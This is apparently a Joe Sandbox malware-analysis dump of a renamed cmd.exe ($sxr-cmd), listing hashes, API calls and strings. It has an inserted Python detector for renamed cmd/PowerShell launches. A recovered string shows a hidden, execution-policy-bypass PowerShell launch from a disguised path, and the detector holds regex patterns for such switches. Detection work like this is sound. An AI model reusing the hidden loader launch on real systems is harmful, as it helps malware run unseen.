                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                      • API String ID: 3637805771-3100821235
                                                                                                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                      • Instruction ID: c55786e07be2cdb6db0303cd7ca8f570828f2f06a1d3a756b6e217303dac239c
                                                                                                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                      • Instruction Fuzzy Hash: 72E16B39A08E52CAE7209F65A844179FBB1FB49FA5B459234DD1E937B4EF3CA805C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                      • String ID: DPATH
                                                                                                                      • API String ID: 95024817-2010427443
                                                                                                                      • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                      • Instruction ID: 5907da2541f0eca2e19faeed21f356322d13e777e117968f8933cc79964bae13
                                                                                                                      • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                      • Instruction Fuzzy Hash: 8912643AA18A82C6EB649F259440179FFA1FB89F64F455235DA5E977A4DF3CEC00CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                      • API String ID: 0-1980097535
                                                                                                                      • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                                      • Instruction ID: 87c1e07e79dd5cdb167747492cd25e74ffd98587e66ce937ea961f5e5f70b972
                                                                                                                      • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                                                                                                      • Instruction Fuzzy Hash: BA32917AA08F8286EB20DF25D4942F9B7B0EB45FA4F414136DA0D876A6DF3CE945C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                                                                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                      • API String ID: 4111365348-3662956551
                                                                                                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                      • Instruction ID: f3c42d758714c7379b3ce8c3c4914c7a845126a74086a5fd2ace5a28b7e2d698
                                                                                                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                      • Instruction Fuzzy Hash: 13E19E69E08E42C6EB50CF68A8401B9EBA1BF45FA8F545132D90ED76B5DF3CED458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _wcsupr.MSVCRT ref: 00007FF61551EF33
                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551EF98
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551EFA9
                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551EFBF
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF61551EFDC
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551EFED
                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F003
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F022
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F083
                                                                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F092
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F0A5
                                                                                                                      • towupper.MSVCRT ref: 00007FF61551F0DB
                                                                                                                      • wcschr.MSVCRT ref: 00007FF61551F135
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F16C
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF61551E964), ref: 00007FF61551F185
                                                                                                                        • Part of subcall function 00007FF6155001B8: _get_osfhandle.MSVCRT ref: 00007FF6155001C4
                                                                                                                        • Part of subcall function 00007FF6155001B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF6155001D6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                      • String ID: <noalias>$CMD.EXE
                                                                                                                      • API String ID: 1161012917-1690691951
                                                                                                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                      • Instruction ID: fa0cfaae1f7a6541d3cc6a64863540525ffd1c5a1ceab882eba4ce5225492382
                                                                                                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                      • Instruction Fuzzy Hash: FA917D2AB09E528AFB149B74E8501BDBAB0AF49F64F494135DD1E826B5EF3CAC458310
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF615503578: _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                        • Part of subcall function 00007FF615503578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                        • Part of subcall function 00007FF615503578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                        • Part of subcall function 00007FF615503578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                        • Part of subcall function 00007FF615503578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                        • Part of subcall function 00007FF615503578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF6154F32F3
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014,?,?,0000002F,00007FF6154F32A4), ref: 00007FF6154F3309
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6154F3384
                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6155111DF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 611521582-0
                                                                                                                      • Opcode ID: d412da15cb949554b081a41741d7db10ae4ffc54f36c72ea7b4e9065a2faff7a
                                                                                                                      • Instruction ID: cb19ea0827d5e2c7d343c0f2181014f36188174ed9a82c458a9d72d2ea3f89f7
                                                                                                                      • Opcode Fuzzy Hash: d412da15cb949554b081a41741d7db10ae4ffc54f36c72ea7b4e9065a2faff7a
                                                                                                                      • Instruction Fuzzy Hash: 52A16026B08E12CAEB148B69A8442BDFBA1FB49F65F455135CD0EC67A5DF3CAC45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                      • String ID: \\?\
                                                                                                                      • API String ID: 628682198-4282027825
                                                                                                                      • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                      • Instruction ID: 853d749fe8e60687e22ce65127e84a8954a5f98150664ed2b0336c59c9dd876c
                                                                                                                      • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                      • Instruction Fuzzy Hash: 19E18136B08A8296EB649B28D9502F9B7A0FB45F69F405136D90EC77E4EF3CE955C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX, xrefs: 00007FF61550C9F1
                                                                                                                      • GOTO, xrefs: 00007FF6154FD0A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                      • String ID: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX$GOTO
                                                                                                                      • API String ID: 3863671652-3149232499
                                                                                                                      • Opcode ID: 0ae25ffffae42cbeff07b69f34e00ae9c076a34045a6fc06e9c4354b30aa6740
                                                                                                                      • Instruction ID: a4b276466259d09d61d6b8eed9b829b80bd3fe23192a6da52d5bb97216b9c645
                                                                                                                      • Opcode Fuzzy Hash: 0ae25ffffae42cbeff07b69f34e00ae9c076a34045a6fc06e9c4354b30aa6740
                                                                                                                      • Instruction Fuzzy Hash: 06E1BB29A0DE4286FAA49B2DE4543B9E7A0AF46F74F554136C95EC62F1DF3CEC458300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%
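The string recovered above from the memory of the $sxr-cmd process is the launch line for a second renamed system binary, C:\Windows\$sxr-powershell.exe, started with -WindowStyle hidden -ExecutionPolicy bypass. The neighbouring functions of the same image carry cmd.exe internals (COPYCMD, DPATH, GOTO, the default PATHEXT list .COM;.EXE;.BAT;...), so both processes are copies of stock Windows tools placed directly in C:\Windows under non-standard names. Two properties make such launches visible in process-creation telemetry: a copied cmd.exe or powershell.exe keeps its PE version resource, so its OriginalFileName no longer matches the on-disk name, and PowerShell host switches are meaningless on an image that is not a PowerShell host. The Python below is an added example, not part of the Joe Sandbox report, that applies both checks to records shaped like Sysmon Event ID 1. The sample records are constructed here: only the first command line is taken verbatim from the string above (truncated in the report after "function ZX"), and the OriginalFileName values and the other two records are assumptions.

```python
"""Flag renamed cmd.exe / powershell.exe launches in process-creation records.

Added illustration, not part of the Joe Sandbox report. Records mimic the fields
of a Sysmon Event ID 1 (Image, OriginalFileName, CommandLine). All sample data
below is constructed except the first command line, which is the string found
in the $sxr-cmd.exe memory dump (truncated in the report after "function ZX").
"""
import re
from dataclasses import dataclass

# Binaries whose renamed copies we care about, keyed by PE OriginalFileName
# (lower-cased), mapped to the directories the genuine binary lives in.
EXPECTED_DIRS = {
    "powershell.exe": {r"c:\windows\system32\windowspowershell\v1.0",
                       r"c:\windows\syswow64\windowspowershell\v1.0"},
    "pwsh.exe": {r"c:\program files\powershell\7"},
    "cmd.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}
POWERSHELL_IMAGES = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# PowerShell host switches with the short forms the host accepts.  Each family
# counts once, so "-nop" and "-NoProfile" are the same signal.
SWITCH_FAMILIES = {
    "nologo": r"-no(?:logo|l)\b",
    "noprofile": r"-no(?:profile|p)\b",
    "noninteractive": r"-no(?:ninteractive|ni)\b",
    "windowstyle": r"-w(?:indowstyle)?\s+(?:hidden|1)\b",
    "executionpolicy": r"-e(?:xecutionpolicy|xec|p)\s+(?:bypass|unrestricted)\b",
    "command": r"-c(?:ommand)?\s+\S",
    "encodedcommand": r"-e(?:ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{20,}",
}
SWITCH_RES = {k: re.compile(v, re.IGNORECASE) for k, v in SWITCH_FAMILIES.items()}


@dataclass
class ProcEvent:
    image: str               # Sysmon 'Image': full path of the new process
    original_file_name: str  # Sysmon 'OriginalFileName': from the PE version resource
    command_line: str        # Sysmon 'CommandLine'


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def dirname(path):
    return path.lower().rsplit("\\", 1)[0]


def switch_families(command_line):
    """Return the set of PowerShell switch families present on a command line."""
    return {name for name, rx in SWITCH_RES.items() if rx.search(command_line)}


def analyze(ev):
    """Return a list of human-readable findings for one process-creation event."""
    findings = []
    name = basename(ev.image)
    orig = ev.original_file_name.lower()

    # 1. A copied binary keeps its version resource: OriginalFileName still says
    #    cmd.exe / powershell.exe while the on-disk name is something else.
    if orig in EXPECTED_DIRS and name != orig:
        findings.append(f"OriginalFileName {orig} but image name is {name}")

    # 2. The genuine host lives in a known directory; C:\Windows itself is not one.
    if orig in EXPECTED_DIRS and dirname(ev.image) not in EXPECTED_DIRS[orig]:
        findings.append(f"{orig} launched from unexpected directory {dirname(ev.image)}")

    # 3. PowerShell host switches on an image that is not a PowerShell host.
    families = switch_families(ev.command_line)
    if families and name not in POWERSHELL_IMAGES:
        findings.append(f"PowerShell switches {sorted(families)} on non-PowerShell image {name}")

    # 4. Hidden window plus execution-policy bypass is the usual loader pattern.
    if {"windowstyle", "executionpolicy"} <= families:
        findings.append("hidden window combined with execution-policy bypass")
    return findings


def scan(events):
    """Map image path -> findings for every event that produced at least one."""
    report = {}
    for ev in events:
        findings = analyze(ev)
        if findings:
            report[ev.image] = findings
    return report


# Constructed sample records; OriginalFileName values are assumed, not from the report.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\$sxr-powershell.exe", "PowerShell.EXE",
              r"C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive "
              r"-WindowStyle hidden -ExecutionPolicy bypass -Command function ZX"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\$sxr-cmd.exe", "Cmd.Exe",
              r"C:\Windows\$sxr-cmd.exe"),  # command line constructed; not shown in the report
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS).items():
        print(image)
        for finding in findings:
            print("   ", finding)
```

Run with python3 to print the findings for the three sample records: the renamed PowerShell trips all four checks, the renamed cmd.exe trips the two version-resource and location checks, and the stock powershell.exe launch produces none. On a live host the same version-resource check is `(Get-Item <path>).VersionInfo.OriginalFilename` in PowerShell, which for a renamed copy of cmd.exe still returns Cmd.Exe.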

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                      • String ID: $Application$System
                                                                                                                      • API String ID: 3538039442-1881496484
                                                                                                                      • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                      • Instruction ID: e8a5b2f733b7a41be084e0ac652e4b08bf95ddf8339879dcc82f7bf4e31aa5d9
                                                                                                                      • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                      • Instruction Fuzzy Hash: 81519A3AA09F41D6EB208B29B44067AFAA1FB89F64F459135DE4E877A4DF3CD845C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                      • String ID: COPYCMD$\
                                                                                                                      • API String ID: 3989487059-1802776761
                                                                                                                      • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                      • Instruction ID: 81e0ca4bec371da2c34eec566ff28fabccb0fd6e606598ee9012d9ed22bd20dc
                                                                                                                      • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                      • Instruction Fuzzy Hash: 00F1C369A08F4682EA549F19D4542BAB7A0FF45FA8F048036CA4E877B5EF3CE855C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                      • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                      • API String ID: 55602301-2548490036
                                                                                                                      • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
